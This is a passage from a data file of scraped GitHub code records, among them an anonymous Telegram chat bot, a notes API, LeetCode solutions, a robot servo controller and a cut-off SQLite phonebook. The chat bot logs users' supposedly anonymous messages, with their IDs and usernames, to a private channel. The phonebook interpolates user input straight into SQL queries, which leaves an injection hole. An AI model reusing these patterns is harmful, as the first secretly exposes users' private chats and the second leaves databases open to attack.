db.get_name_user(d) == None:\n                    rofl_list = ['\\nебааа#ь ты жёсткий😳','\\nвасап👋','\\nбро полегче там😮','\\nгений🧠','\\nреспект🤟']\n                    final_top = final_top + str(top_count) + ' Juara - :(нету ника' + ' - ' + str(db.get_count_all_msg(d)) + ' Pesan' + rofl_list[top_count-1] + '\\n'\n                else:\n                    rofl_list = ['\\n>>Bagus Bisa Mencapai Rekor😳','\\n>>Lumayan Lah🙈','\\n>>Sedikit Menarik😮','\\n>>Jenius Kayanya🧠','\\n>>Jomblo pasti😂']\n                    final_top = final_top + 'Rangking ' + str(top_count) + ' - @' + str(db.get_name_user(d)) + ' - ' + str(db.get_count_all_msg(d)) + ' Pesan' + rofl_list[top_count-1] + '\\n'\n        await message.answer(f'Peringkat Teratas Untuk saat ini\\nDalam menggunakan bot😎 :\\n\\n{final_top}')\n    except Exception as e:\n        warning_log.warning(e)\n\n#state machine class\nclass Chating(StatesGroup):\n\tmsg = State()\n\n@dp.message_handler(lambda message: message.text == 'Laki-Laki' or message.text == 'Perempuan',state='*')\nasync def chooce_sex(message : types.Message, state: FSMContext):\n    ''' Choosing the gender to search for '''\n    try:\n        if db.queue_exists(message.from_user.id):\n            db.delete_from_queue(message.from_user.id)\n        if message.text == 'Laki-Laki':\n            db.edit_sex(True,message.from_user.id)\n            db.add_to_queue(message.from_user.id,True)\n        elif message.text == 'Perempuan':\n            db.edit_sex(False,message.from_user.id)\n            db.add_to_queue(message.from_user.id,False)\n        else:\n            db.add_to_queue(message.from_user.id,db.get_sex_user(message.from_user.id)[0])\n        await message.answer('Tunggu Sebentar..Kami Sedang mencari Pasanganmu')\n\n        #buttons\n        stop = KeyboardButton('❌Hentikan Obrolan')\n\n        share_link = KeyboardButton('Kirim ID kamu😜')\n\n        coin = KeyboardButton('Bikin pasanganmu baper🙈')\n\n        menu_msg = ReplyKeyboardMarkup()\n\n        menu_msg.add(stop,share_link,coin)\n\n        while True:\n            await asyncio.sleep(0.5)\n            if db.search(db.get_sex_user(message.from_user.id)[0]) != None: #if a suitable user was found in the queue\n                try:\n                    db.update_connect_with(db.search(db.get_sex_user(message.from_user.id)[0])[0],message.from_user.id) #update whom the user is talking to\n                    db.update_connect_with(message.from_user.id,db.search(db.get_sex_user(message.from_user.id)[0])[0])\n                    break\n                except Exception as e:\n                    print(e)\n\n        while True:\n            await asyncio.sleep(0.5)\n            if db.select_connect_with(message.from_user.id)[0] 
!= None: #if the user has connected\n\n\n                break\n\n\n        try:\n            db.delete_from_queue(message.from_user.id) #remove from the queue\n            db.delete_from_queue(db.select_connect_with(message.from_user.id)[0])\n        except:\n            pass\n\n        await Chating.msg.set()\n\n\n        await bot.send_message(db.select_connect_with(message.from_user.id)[0],'Pasangan Ditemukan.. Silahkan mulai Obrolan💬',reply_markup=menu_msg)\n        await message.answer('Pasangan Ditemukan... Silahkan mulai Obrolan💬',reply_markup=menu_msg)\n        return\n    except Exception as e:\n        warning_log.warning(e)\n        await send_to_channel_log_exception(message,e)\n\n\n@dp.message_handler(content_types=ContentTypes.TEXT)\n@dp.message_handler(state=Chating.msg)\nasync def chating(message : types.Message, state: FSMContext):\n    ''' Function where the conversation happens and TEXT messages are exchanged '''\n    try:\n\n        next = KeyboardButton('➡️Mencari Pasangan Baru')\n\n        back = KeyboardButton('Back')\n\n        menu_msg_chating = ReplyKeyboardMarkup()\n\n        menu_msg_chating.add(next,back)\n\n        await state.update_data(msg=message.text)\n\n        user_data = await state.get_data()\n\n        if user_data['msg'] == 'Kirim ID kamu😜':\n            if message.from_user.username == None:\n                await bot.send_message(db.select_connect_with_self(message.from_user.id)[0],'Kamu belum mengatur Username, Silahkan atur username kamu...\\nDi pengaturan Telegran!')\n            else:\n                await bot.send_message(db.select_connect_with_self(message.from_user.id)[0],'Pasanganmu mengirimkan ID\\n@' + message.from_user.username)\n                await message.answer('ID @' + message.from_user.username +str (' Sudah Terkirim \\nKePasanganmu😜'))\n\n        elif user_data['msg'] == '❌Hentikan Obrolan':\n            await message.answer('Obrolan dihentikan!',reply_markup=menu_msg_chating)\n            await bot.send_message(db.select_connect_with(message.from_user.id)[0],'Obrolan dihentikan!',reply_markup=menu_msg_chating)\n            db.update_connect_with(None,db.select_connect_with(message.from_user.id)[0])\n            db.update_connect_with(None,message.from_user.id)\n\n        elif user_data['msg'] == '➡️Mencari Pasangan Baru':\n            await chooce_sex(message,state)\n\n        elif user_data['msg'] == 'Bikin pasanganmu baper🙈':\n            coin = random.randint(1,2)\n\n            if coin == 1:\n                coin = text(italic('Aku sayang kamu by❤️'))\n            else:\n                coin = text(italic('Aku pengen peluk kamu🙊'))\n\n            await message.answer(coin,parse_mode=ParseMode.MARKDOWN)\n            await bot.send_message(db.select_connect_with(message.from_user.id)[0],coin,parse_mode=ParseMode.MARKDOWN)\n\n        elif user_data['msg'] == 'Home':\n            await start(message,state)\n            await state.finish()\n\n        else:\n            await bot.send_message(db.select_connect_with(message.from_user.id)[0],user_data['msg']) #forward the user's message\n            db.log_msg(message.from_user.id,user_data['msg']) #log users' messages to the db\n            db.add_count_msg(message.from_user.id) #increment the message count in the db for the rating\n            await send_to_channel_log(message)\n\n    except aiogram.utils.exceptions.ChatIdIsEmpty:\n        await state.finish()\n        await start(message,state)\n    except aiogram.utils.exceptions.BotBlocked:\n        await message.answer('keluar dari bot!')\n        await state.finish()\n        await start(message,state)\n    except Exception as e:\n        warning_log.warning(e)\n        await send_to_channel_log_exception(message,e)\n\n@dp.message_handler(content_types=ContentTypes.PHOTO,state=Chating.msg)\nasync def chating_photo(message : types.Message, state: FSMContext):\n    ''' Function where the conversation happens and PHOTOS are exchanged '''\n    try:\n        await message.photo[-1].download('photo_user/' + str(message.from_user.id) + '.jpg')\n        with open('photo_user/' + 
str(message.from_user.id) + '.jpg','rb') as photo:\n            await bot.send_photo(db.select_connect_with(message.from_user.id)[0],photo,caption=message.text)\n    except Exception as e:\n        warning_log.warning(e)\n        await send_to_channel_log_exception(message,e)\n\n@dp.message_handler(content_types=ContentTypes.STICKER,state=Chating.msg)\nasync def chating_sticker(message : types.Message, state: FSMContext):\n    ''' Function where the conversation happens and STICKERS are exchanged '''\n    try:\n        await bot.send_sticker(db.select_connect_with(message.from_user.id)[0],message.sticker.file_id)\n    except Exception as e:\n        warning_log.warning(e)\n        await send_to_channel_log_exception(message,e)\n\n\n\n\n#handler for the back command\n@dp.message_handler(commands=['back'])\n@dp.message_handler(lambda message : message.text == 'Kembali',state='*')\nasync def back(message : types.Message, state: FSMContext):\n    ''' Function for the back command '''\n    await state.finish()\n    await start(message,state)\n\n#logs to a telegram channel\nasync def send_to_channel_log(message : types.Message):\n    await bot.send_message(-1001422742707,f'ID - {str(message.from_user.id)}\\nusername - {str(message.from_user.username)}\\nmessage - {str(message.text)}')\n\nasync def send_to_channel_log_exception(message : types.Message,except_name):\n    await bot.send_message(-1001422742707,f'Ошибка\\n\\n{except_name}')\n\n\n#admin panel\n@dp.message_handler(lambda message: message.text.startswith('/sendmsg_admin'),state='*')\nasync def admin_send_msg(message : types.Message):\n    if message.from_user.id in config.ADMIN_LIST:\n        msg = message.text.split(',')\n        await bot.send_message(int(msg[1]),'Pesan dari admin:\\n' + msg[2])\n    else:\n        await message.answer('Kamu bukan admin!')\n\n#handler that fires on an unexpected user request\n@dp.message_handler()\nasync def end(message : types.Message):\n\t'''Function for the fallback reply'''\n\tawait message.answer('Saya hanya mengingatkan bahwa ada perintah /start dan /help')\n\n\nif __name__ == '__main__':\n    executor.start_polling(dp, skip_updates=True,)\n","repo_name":"davi78/botanon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24617003765","text":"import re\nfrom typing import List\nfrom app.note.models import Note\n\n\nasync def add(data: str, title: str=None) -> Note:\n    new_note = await Note.create(data=data, title=title)\n    return new_note\n\n\nasync def get(id: int) -> Note:\n    note = await Note.get_or_none(id=id)\n    return note\n\n\nasync def get_all() -> List[Note]:\n    notes = await Note.all()\n    return notes\n\n\nasync def filter_by(text: str) -> List[Note]:\n    notes = await Note.filter(data__icontains=text)\n    return notes\n\n\nasync def update(note_to_update: Note, note_data: dict):\n    for field_name in note_data:\n        setattr(note_to_update, field_name, note_data.get(field_name))\n    await note_to_update.save()\n    return note_to_update\n","repo_name":"karthikasasanka/fastapi-tortoise-orm-postgresql","sub_path":"app/note/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"71438608488","text":"#!/usr/bin/env python\n\nfrom opentire import OpenTire\nfrom opentire.Core import TireState\nfrom opentire.Core import TIRFile\n\nimport numpy as np\n\nif __name__ == \"__main__\":\n\n    # Initialize the tire model\n    openTire = OpenTire()\n    myTireModel = 
openTire.createmodel('PAC2002')\n\n    # Initialize the tire state\n    state = TireState()\n    state['FZ'] = 1500\n    state['IA'] = 0.0\n    state['SR'] = 0.0\n    state['SA'] = 0.0\n    state['FY'] = 0.0\n    state['V'] = 10.0\n    state['P'] = 260000\n\n    # Define the slip angle range\n    slip_angles = np.arange(-12, 13, 1) * 3.14 / 180\n\n    # Print out some pretty formatting\n    print('OpenTire Slip Angle Sweep Demo\\n')\n    print('{0:>10} | {1:>10} | {2:>10} | {3:>10} | {4:>10}'\n          .format('SA [deg]',\n                  'FZ [N]',\n                  'FY [N]',\n                  'MZ [Nm]',\n                  'MX [Nm]'))\n    print('=' * 62)\n\n    # Calculate and print out the tire model outputs\n    for sa in slip_angles:\n        state['SA'] = sa\n        myTireModel.solve(state)\n        print('{0:>10.0f} | {1:>10.0f} | {2:>10.1f} | {3:>10.1f} | {4:>10.1f}'\n              .format(state['SA'] * 180 / 3.14,\n                      state['FZ'],\n                      state['FY'],\n                      state['MZ'],\n                      state['MX']))\n\n","repo_name":"OpenTire/OpenTirePython","sub_path":"examples/SA_Sweep_Example.py","file_name":"SA_Sweep_Example.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"13749282656","text":"\"\"\"\nReturn the full set of permutations without duplicates.\n\nInput: [1,1,2]\nOutput:\n[\n    [1,1,2],\n    [1,2,1],\n    [2,1,1]\n]\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n    def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n        n = len(nums)\n        res = []\n        path = []\n        used = [False] * n\n\n        nums.sort()  # sort first so equal elements end up adjacent, which makes the pruning check easy\n\n        def dfs(depth):\n            if depth == len(nums):  # already at the last level\n                res.append(path[:])  # copy the path object\n                return\n            # visiting the n indices in order happens to give lexicographic order\n            for i in range(n):\n                # used[] keeps the taken/free state of every i, so we never search path itself\n                if used[i]:  # element already taken earlier in the path\n                    continue\n\n                # not used[i - 1] means its choice was just undone on backtrack, i.e. the equal values would be sibling nodes on the same level\n                if i > 0 and nums[i] == nums[i - 1] and not used[i - 1]:\n                    continue\n\n                # if i is still unused\n                path.append(nums[i])\n                used[i] = True  # note: setting every equal element to True here would run the loop dry and the tree would never reach depth n\n\n                # search for the next element\n                dfs(depth + 1)\n                # backtrack, reset the state\n                path.pop()  # remove the last one\n                used[i] = False\n\n        dfs(0)\n        return res\n\n\ns = Solution()\na = s.permuteUnique([1, 2, 5, 5, 5])\nprint(len(a))\nprint(a)\n","repo_name":"Shuai-Xie/LeetCode","sub_path":"leetcode/47 全排列2.py","file_name":"47 全排列2.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7778835786","text":"class Solution:\n    def pivotIndex(self, nums: List[int]) -> int:\n        s = sum(nums)\n        p = 0\n\n        for i, v in enumerate(nums):\n\n            if s - p * 2 == v:\n                return i\n            p += v\n\n        return -1\n","repo_name":"kevinliao852/code-problem-solutions","sub_path":"leetcode/python/724.py","file_name":"724.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20819826556","text":"import random\nfrom TestFunctions import ackley_function\nfrom Visualization import epoch_result_cols\nimport pandas as pd\n\nc1 = 1\nc2 = 2\nw = 0.85\nINIT_FITNESS = -float(\"inf\")\nmm=-1\n\nclass Particle:\n    def __init__(self, bounds):\n\n        self.position=[] # x y\n        self.velocity=[] # x y\n        self.best_position=[]\n        init_fitness = INIT_FITNESS\n        self.fittnes_best_position = init_fitness\n        self.fitness_position = init_fitness\n        self.DIM = 2 # x and y\n        for i in range(self.DIM):\n            self.position.append(random.uniform(bounds[i][0], bounds[i][1]))\n            self.velocity.append(random.uniform(-1,1))\n    \n    def evaluate(self,objective_function):\n\n        self.fitness_position = objective_function([[self.position[0]], [self.position[1]]]) # get fitness at the current particle position\n        
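# (clarifying note, added) fittnes_best_position starts at INIT_FITNESS = -inf,\n        # which acts as a \"not yet evaluated\" sentinel: the first call always records a\n        # personal best, and afterwards only a strictly smaller (better) fitness replaces it.\n        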
if self.fitness_position < self.fittnes_best_position or self.fittnes_best_position == INIT_FITNESS:\n            self.best_position = self.position #update particle best\n            self.fittnes_best_position = self.fitness_position\n\n    def update_velocity(self, global_best_position):\n        for i in range(self.DIM):\n            r1 = random.random()\n            r2 = random.random()\n            personal_velocity = PSO.c1 * r1 * (self.best_position[i] - self.position[i])\n            swarm_velocity = PSO.c2 * r2 * (global_best_position[i] - self.position[i])\n            self.velocity[i] = w * self.velocity[i] + personal_velocity + swarm_velocity\n    \n    def update_position(self, bounds):\n        for i in range(self.DIM):\n            self.position[i] = self.position[i]+self.velocity[i]\n            #Upperbound check\n            if self.position[i]>bounds[i][1]:\n                self.position[i]=bounds[i][1]\n            if self.position[i] 20480000:\n                    print(\"File size exceeds 20mb, please choose another file\")\n                    correct_attachment = False\n                else:\n                    attachment.append(filename)\n                    correct_attachment = True\n            except:\n                print(\"File does not exist!, please choose another attachment!\")\n\n            choice = input(\"Is there another attachment that you want to select?(Y/n): \")\n            if evaluate(choice):\n                correct_attachment = False\n            else:\n                correct_attachment = True\n\n    os.chdir(\"../credentials\")\n\n    print(\"Loading account info please wait.....\")\n    try:\n        ezgmail.init()\n    except:\n        print(\"Unable to initialize account, please check your credentials.json\")\n        exit(-1)\n\n    print(\"Account is loaded!\")\n\n    title = input(\"Please type in the title of email: \")\n    data = fd.read()\n\n    for row in dict_reader:\n        if not len(attachment):\n            ezgmail.send(row[\"Email\"], title, data)\n        else:\n            ezgmail.send(row[\"Email\"], title, data, attachment)\n        print(\"Email to\", row[\"ClientName\"], \"sent!\")\n\n    usr_input = input(\"All email sent, do you want to send another one?(Y/n): \")\n\n    if evaluate(usr_input):\n        main()\n    else:\n        print(\"exiting script now, have a nice day :)\")\n\n    fd.close()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"tasuka98/Automated_EmailSender","sub_path":"src/automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37177942565","text":"from multiprocessing import Process, Pipe, Manager, Value\nfrom Adafruit_PWM_Servo_Driver import PWM\nfrom dataposter import DataPoster\nimport RPi.GPIO as GPIO\nimport datetime, time\nimport pandas as pd\nimport numpy as np\nimport subprocess as sbp\nimport logging\nimport os\nimport glob\nimport json\nimport csv\nimport copy \nimport thread\n\n\n\nclass RobotControl():\n    def setServoPulse(self,channel, pulse):\n        pulseLength = 1000000                   # 1,000,000 us per second\n        pulseLength /= 60                       # 60 Hz\n        pulseLength /= 4096                     # 12 bits of resolution\n        pulse *= 1000\n        pulse /= pulseLength\n        self.pwm.setPWM(channel, 0, pulse)\n\n    def dataPoster(self, state):\n        print('TODO: Flesh this out')\n\n    def start(self):\n        logging.info('Run started')\n\n#        self.dataPoster = DataPoster()\n#        self.dataPoster.initialize(self.teachpoints,self.sequences,self.state)\n#        self.parent_conn, self.child_conn = Pipe()\n#        p = Process(target=self.dataPoster.changeState)\n#        p.start()\n\n        self.mainMenu()\n\n     #   p.join()\n\n\n    def goToTeachPoint(self,teachpoint,delay=1,steps=25):\n        #this simply jerks then does a linear ramp over the move delay. For longer moves, it is best practice to ramp at accel_max, move at vel_max, then decel. 
The throw of the ROT2U is negligible for this, YMMV.\n        incdelay = 1.0*delay/steps\n        tp = self.teachpoints[self.teachpoints['Position'] == teachpoint]\n        if tp.shape<1:\n            logging.info('Teachpoint not found')\n            return\n        movesarr = np.zeros((6,steps)) \n        for channel,col in enumerate(tp.columns[2:]):\n            position = tp.loc[tp.index[0],col]\n            if ~pd.isnull(position):\n                movesarr[channel] = np.linspace(self.servoPositions[channel],position,steps)\n            else:\n                movesarr[channel] = np.ones(steps) * self.servoPositions[channel] #dont move this servo\n        movesarr = np.round(movesarr)\n        for x in np.arange(0,steps):\n            cur_positions = movesarr[:,x]\n            for channel,value in enumerate(cur_positions):\n                self.pwm.setPWM(channel,0,int(value))\n                self.servoPositions[channel] = int(value)\n            time.sleep(incdelay)\n\n    def goToServoPositionSmooth(self,channel,position,delay=1,steps=25):\n        #this simply jerks then does a linear ramp over the move delay. For longer moves, it is best practice to ramp at accel_max, move at vel_max, then decel. The throw of the ROT2U is negligible for this, YMMV.\n        incdelay = 1.0*delay/steps\n        start_position = self.servoPositions[channel]\n        inc_step = 1.0*(position - start_position)/steps\n        new_pos = start_position\n\n        while(True):\n            arrived = False\n            new_pos = int(new_pos + inc_step)\n            \n            if (start_position > position):\n                if (new_pos<=position):\n                    arrived = True\n                    new_pos = position\n            else:\n                if (new_pos >= position):\n                    arrived = True\n                    new_pos = position\n            self.pwm.setPWM(channel,0,new_pos)\n            self.servoPositions[channel] = new_pos\n            if arrived:\n                break\n            print('moved {}, sleeping for {}'.format(new_pos,incdelay))\n            time.sleep(incdelay)\n        \n        \n\n\n        self.pwm.setPWM(channel,0,position)\n        self.servoPositions[channel] = position #update current log of positions\n\n\n    def goToServoPosition(self,channel,position):\n        self.pwm.setPWM(channel,0,position)\n        self.servoPositions[channel] = position #update current log of positions\n    \n    def printCurrentServoPositions(self):\n        for x,pos in enumerate(self.servoPositions):\n            print(str(x)+ \": \" + str(pos))\n        self.changeState(0)\n\n\n    def goToTeachPointMenu(self):\n        while (True):\n            print('\\n')\n            teachPoint = raw_input(\"Please input a teachpoint to go to. Enter l to list available teachpoints, q to return to the main menu: \")\n            if teachPoint == 'l':\n                for pos in self.teachpoints['Position'].unique():\n                    print(pos)\n            elif teachPoint == 'q':\n                break;\n            else:\n                self.goToTeachPoint(teachPoint)\n        self.changeState(0)\n\n\n    def runSequenceMenu(self):\n        while (True):\n            print('\\n')\n            sequence = raw_input(\"Please input a sequence to run. Enter l to list available sequences, q to return to the main menu: \")\n            if sequence == 'l':\n                for seq in self.sequences['sequence'].unique():\n                    print(seq)\n            elif sequence == 'q':\n                break;\n            else:\n                self.runSequence(sequence)\n        self.changeState(0)\n\n    # def goToTeachPoint(self,teachpoint,delay=0):\n    #     tp = self.teachpoints[self.teachpoints['Position'] == teachpoint]\n    #     if tp.shape<1:\n    #         logging.info('Teachpoint not found')\n    #         return\n    #     for channel,col in enumerate(tp.columns[2:]):\n    #         position = tp.loc[tp.index[0],col]\n    #         if ~pd.isnull(position):\n    #             self.goToServoPosition(int(channel),int(position))\n    #     if delay>0:\n    #         time.sleep(delay)\n    \n    def goToServoPositionMenu(self):\n        servoextent = ''\n        arrowDelta = 10 #delta to move when using arrow keys\n        while (True):\n            if servoextent == 'q':\n                break;\n            servoChannel = raw_input(\"Please input a servo channel (0-5). 
Enter q to return to the main menu: \")\n if servoChannel == 'q':\n break;\n while(True):\n servoextent = raw_input(\"Please input a servo extent from 0 to 4096, up or down arrows to nudge, or s to switch servo channel, q to return to the main menu\")\n ## TODO: error input handling\n if servoextent == \"s\": \n logging.info('Switching channels')\n break;\n elif servoextent == \"q\":\n logging.info('Return to main menu')\n break;\n elif servoextent == '\\x1b[A': #up\n self.goToServoPosition(int(servoChannel),int(self.servoPositions[int(servoChannel)]+arrowDelta))\n elif servoextent == '\\x1b[B':\n self.goToServoPosition(int(servoChannel),int(self.servoPositions[int(servoChannel)]-arrowDelta))\n else:\n self.goToServoPosition(int(servoChannel), int(servoextent))\n self.changeState(0)\n \n def input_thread(self, a_list):\n raw_input(\"Press enter to stop sequence\")\n a_list.append(True)\n print('Stopping loop after this sequence run completes')\n\n def runSequence(self, sequence):\n try:\n cur_seq = self.sequences[self.sequences['sequence'] == sequence].iloc[0]\n pts = [str(p).strip() for p in cur_seq['teachpoints'].split(',')]\n delays = cur_seq['delays'].split(',')\n except:\n logging.info('No sequence ')\n if len(delays) != len(pts):\n logging.info('Delays array is a different length than teachpoints. Generating delays')\n delays = np.ones(len(pts))\n\n print('Running sequence')\n\n a_list = []\n if cur_seq['loop']:\n thread.start_new_thread(self.input_thread, (a_list,))\n while not a_list:\n for x,pt in enumerate(pts):\n #print(pt)\n self.goToTeachPoint(pt,int(delays[x]))\n if not cur_seq['loop']:\n break\n\n def shutdown(self):\n logging.info('Shutting down system')\n self.goToTeachPoint('safety')\n time.sleep(0.5)\n self.goToTeachPoint('rest')\n\n def testSequence(self):\n while(True):\n self.goToTeachPoint('safety')\n time.sleep(1)\n self.goToTeachPoint('left_pick_hover')\n time.sleep(1)\n self.goToTeachPoint('left_pick')\n time.sleep(1)\n self.goToTeachPoint('grip_closed')\n time.sleep(1)\n self.goToTeachPoint('left_pick_hover')\n time.sleep(1)\n self.goToTeachPoint('safety')\n time.sleep(1)\n self.goToTeachPoint('right_pick_hover')\n time.sleep(1)\n self.goToTeachPoint('grip_open')\n time.sleep(1)\n self.goToTeachPoint('right_pick')\n time.sleep(1)\n self.goToTeachPoint('grip_closed')\n time.sleep(1)\n self.goToTeachPoint('right_pick_hover')\n time.sleep(1)\n\n def changeState(self, newState):\n try:\n states = {\n 0 : 'mainMenu',\n 1 : 'runSequence',\n 2 : 'goToTeachPoint',\n 3 : 'goToServoPosition',\n 4 : 'printCurrentServoPositions',\n 5 : 'shutdown',\n } \n self.state['state'] = states[newState]\n\n options = {\n 0 : self.mainMenu,\n 1 : self.runSequenceMenu,\n 2 : self.goToTeachPointMenu,\n 3 : self.goToServoPositionMenu,\n 4 : self.printCurrentServoPositions,\n 5 : self.shutdown,\n } \n options[newState]()\n except:\n print('Invalid option, returning to main menu')\n self.changeState(0)\n\n\n\n def mainMenu(self):\n print('\\n\\n\\n')\n print('Main Menu:____________________________________________________________________________________')\n print('Please enter a number to select one of the following options:')\n print('1. Run Sequence')\n print('2. Go To TeachPoint')\n print('3. Go To Servo Position')\n print('4. List Current Servo Positions')\n print('5. 
Shutdown')\n        newState = raw_input(\"Please input a number: \")\n        self.changeState(int(newState))\n\n    def __init__(self):\n        number_of_servos = 6\n\n        installdir = os.path.dirname(__file__)\n\n        logging.basicConfig(filename=installdir + '/robotcontrol.log',level=logging.INFO)\n        self.teachpoints = pd.read_csv(installdir + '/Teachpoints.csv')\n        self.sequences = pd.read_csv(installdir + '/Sequences.csv',delimiter=';')\n\n        self.pwm = PWM(0x40)\n        self.pwm.setPWMFreq(60)                        # Set frequency to 60 Hz\n        self.servoPositions = self.teachpoints.loc[self.teachpoints['Position']=='rest'].iloc[:,2:].values[0]\n        self.goToTeachPoint('safety')\n        self.state = Manager().dict() #multiprocessing thread safe value passing\n        self.state['state'] = 'Initializing'\n\n","repo_name":"mechiris/RobotControl","sub_path":"robotcontrol/robotcontrol.py","file_name":"robotcontrol.py","file_ext":"py","file_size_in_byte":10841,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"32479472957","text":"def strip_comments(string, markers):\n    new_string = ''\n    i = 0\n    while i < len(string):\n        if string[i] in markers:\n            while True:\n                i += 1\n                \n                if i == len(string):\n                    break\n                if string[i] == '\\n':\n                    break\n        else:\n            new_string += string[i]\n            if i + 1 < len(string) and string[i + 1] in markers:\n                new_string = new_string.rstrip()\n        i += 1\n        \n    return new_string\n\n\n\n\nprint(strip_comments('apples, pears # and bananas\\ngrapes\\nbananas !apples', ['#', '!']))\n'''\napples, pears\ngrapes\nbananas\n---------------------------------------\n[or 'apples, pears\\ngrapes\\nbananas']\n'''\n\nprint(strip_comments('    a #b\\n\\nc\\nd\\n $e f g', ['#', '$']))\n'''\n    a\n\nc\nd\n---------------------------\n[or '    a\\n\\nc\\nd']\n'''","repo_name":"kwesiObuobi/code-and-code","sub_path":"codewars/strip_comments/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15038505455","text":"def cifrado():\r\n    cadena = input(\"Ingresa tu mensaje: \")\r\n    lista=[]\r\n    cad = ''\r\n    for i in cadena:\r\n        lista.append(ord(i))\r\n        i= i.upper()\r\n        j = ord(i) + 2\r\n        if j > ord('Z'):\r\n            j = ord('A') + (j - ord('Z') - 1)  # wrap past 'Z' while keeping the shift, so 'Z' maps to 'B'\r\n        cad += chr(j)\r\n    print('el mensaje en letras es: ',cad, 'el mensaje e numeros es: ',lista)\r\ncifrado()\r\n","repo_name":"paulabohorquez/miscelanea1-2560664-A","sub_path":"cadenasmetodos/cifrado.py","file_name":"cifrado.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12356529771","text":"import requests\r\nimport json\r\n\r\n#rank endpoint: fetch the ranking\r\n\r\ndef getRank():\r\n    url = \"http://47.102.118.1:8089/api/rank\"\r\n    data = requests.get(url)\r\n    result = data.json()\r\n    print(result)\r\n\r\nif __name__ == \"__main__\":\r\n    getRank()","repo_name":"Bergscl/doubleCode","sub_path":"AI/getRank.py","file_name":"getRank.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25185459837","text":"#!/usr/bin/env python\n\"\"\"\n__author__ = Shannon B. 
, 10/19/16\n\"\"\"\n\nimport os\nimport sys\nfrom os import path\nimport urllib.request as req\nimport bs4\nimport datetime\nimport statistics\n\n__version__ = '0.1.0'\n\n'''\n# Example date range: 8/19/16 thru 10/19/16\n# Example BASEURL: https://www.wunderground.com/history/airport/KSZT/\n\n# APPENDED QUERY:\n\n# 2016/8/19/CustomHistory.html?dayend=19&monthend=10&yearend=2016&req_city=&req_state=&req_statename=&reqdb.zip=&reqdb.magic=&reqdb.wmo=\n\n# Table format: Title: Weather History & Observations\n# Year| Temp. (deg F)| Dew Point (deg F)| Humidity (%)| Sea Level Press. (in)| Visibility (mi)| Wind (mph)| Precip. (in)\n# Month | high, avg, low | high, avg, low | etc | etc\n\n# Data to pull: Temperature , Wind Speed, Barometric Pressure (aka Sea Level Press.) -> take avgs. although not ideal\n'''\n\nBASE_URL = 'https://www.wunderground.com/history/airport/KSZT/'\n\n\ndef get_page(url):\n\n    page = req.urlopen(url)\n    return page\n\n\ndef get_soup(page):\n\n    soup = bs4.BeautifulSoup(page, \"lxml\")\n\n    return soup\n\n\ndef construct_date_range_query(start_date, end_date):\n    \"\"\"\n\n    :param start_date: yyyy/mm/dd (the code splits it as year, month, day)\n    :param end_date: may be a 'mm/dd/yyyy' string or a (year, month, day) tuple; both are handled\n    :return: query_string to append BASE_URL\n    \"\"\"\n\n    start_chunks = start_date.split('/')\n\n    if '/' in end_date:\n        end_chunks = end_date.split('/')\n    else:\n        end_chunks = (end_date[1], end_date[2], end_date[0])\n\n    start_year, start_month, start_day = start_chunks\n    end_month, end_day, end_year = end_chunks\n\n    query_to_append = r'{}/{}/{}/CustomHistory.html?dayend={}&monthend={}&yearend={}&req_city=&req_state=' \\\n                      '&req_statename=&reqdb.zip=&reqdb.magic=&reqdb.wmo='.format(\n        start_year, start_month, start_day, end_day, end_month, end_year)\n\n    return BASE_URL + query_to_append\n\n\ndef get_date_range_from_user(*date_range):\n\n    if not date_range:\n\n        end_date = input('Choose an end date to search, use the format yyyy/mm/dd')\n\n    else:\n\n        now = datetime.datetime.now()\n\n        end_year = now.year\n        end_month = now.month\n        end_day = now.day\n\n        end_date = (end_year, end_month, end_day)\n\n    start_date = input(\"Choose a start date in the format yyyy/mm/dd\")\n\n    return start_date, end_date\n\n\ndef main():\n\n    date_tup = get_date_range_from_user('2016/10/2')\n\n    query_string = construct_date_range_query(*date_tup)\n\n    page_soup = get_soup(query_string)\n\n    print(page_soup, end=' ')\n\nif __name__ == '__main__':\n    main()\n","repo_name":"shandozer/code_clinic","sub_path":"lake_pend_oreille/stats_gathering_oreille.py","file_name":"stats_gathering_oreille.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42388598946","text":"# https://habr.com/ru/post/321510/\n\nimport sqlite3\n\n\ndef get_contacts(cursor):\n    '''show all contacts'''\n    cursor.execute(\"select * from phone\")\n    results = cursor.fetchall()\n    return results\n\n\ndef get_contact(item, cursor):\n    '''search for a record'''\n    cursor.execute(f\"select * from phone where surname like '%{item}%'\"\n                   f\"or name like '%{item}%'\")\n    results = cursor.fetchall()\n    if results:\n        return results\n    return 'Контакт не найден'\n\n\ndef add_contact(data, conn, cursor):\n    '''add a contact'''\n    name, surname, telephone = data\n    cursor.execute(\n        f\"insert into phone (name, surname, telephone, description) \"\n        f\"values ('{name}', '{surname}', {telephone}, '')\")\n    conn.commit()\n\n\ndef delete(id, conn, cursor):\n    '''Delete a contact'''\n    try:\n   